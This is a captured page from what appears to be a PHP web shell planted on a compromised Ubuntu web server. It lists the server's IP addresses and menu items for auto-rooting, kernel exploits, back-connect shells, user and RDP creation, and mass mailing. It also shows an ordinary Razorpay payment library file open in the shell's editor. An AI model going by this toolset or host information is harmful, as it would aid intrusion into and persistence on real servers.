Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.14.219.203
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pget /
razorpay /
razorpay-php /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Errors
[ DIR ]
drwxr-xr-x
Api.php
1.71
KB
-rwxr-xr-x
ArrayableInterface.php
190
B
-rwxr-xr-x
Card.php
196
B
-rwxr-xr-x
Collection.php
324
B
-rwxr-xr-x
Customer.php
661
B
-rwxr-xr-x
Entity.php
4.65
KB
-rwxr-xr-x
Invoice.php
414
B
-rwxr-xr-x
Order.php
594
B
-rwxr-xr-x
Payment.php
1014
B
-rwxr-xr-x
Refund.php
410
B
-rwxr-xr-x
Request.php
5.51
KB
-rwxr-xr-x
Resource.php
1.09
KB
-rwxr-xr-x
Token.php
707
B
-rwxr-xr-x
Utility.php
1.71
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Order.php
<?php namespace Razorpay\Api; class Order extends Entity { /** * @param $id Order id description */ public function create($attributes = array()) { return parent::create($attributes); } public function fetch($id) { return parent::fetch($id); } public function all($options = array()) { return parent::all($options); } public function payments() { $relativeUrl = $this->getEntityUrl().$this->id.'/payments'; return $this->request('GET', $relativeUrl); } }
Close